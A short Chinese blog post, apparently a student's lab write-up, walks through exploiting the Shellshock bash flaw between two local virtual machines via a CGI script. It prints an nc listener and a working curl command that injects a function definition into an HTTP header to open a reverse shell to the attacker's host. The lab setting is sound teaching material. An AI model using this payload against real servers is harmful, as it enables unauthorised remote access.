今天在雪城大学的网络实验室学习了著名的破壳漏洞,下面分享一下对此漏洞进行的实战
- 首先在vbox中,我们将两台虚拟机设置为在同一局域网段,不知道如何设置局域网段?点击这里
- 然后我们在被攻击机上建立一个myprog.cgi的文件,在其中写入含有bash调用的代码
#!/bin/bash
echo "Content-type: text/plain"
echo
echo
echo "Hello World"
3.将文件复制到/usr/lib/cgi-bin中并进行权限修改使得其能够被执行
4.我们可以通过另一台机器进行尝试访问,在我这里,被攻击机IP地址为10.0.2.5,攻击机IP地址为10.0.2.4,输入:http://10.0.2.5/cgi-bin/myprog.cgi可以看到,浏览器能够成功访问
5.下面,我们通过shell反弹来登录被攻击机,首先,进行nc监听
nc -lv 4444
6.新打开一个终端,输入
curl -H 'x: () { :;}; /bin/bash -i >& /dev/tcp/攻击IP/4444 0>&1' http://被攻击IP/cgi-bin/myprog.cgi
7.效果如图,成功
![](https://i-blog.csdnimg.cn/blog_migrate/b8aa5417a155ccff7ea022f6a37559d8.png)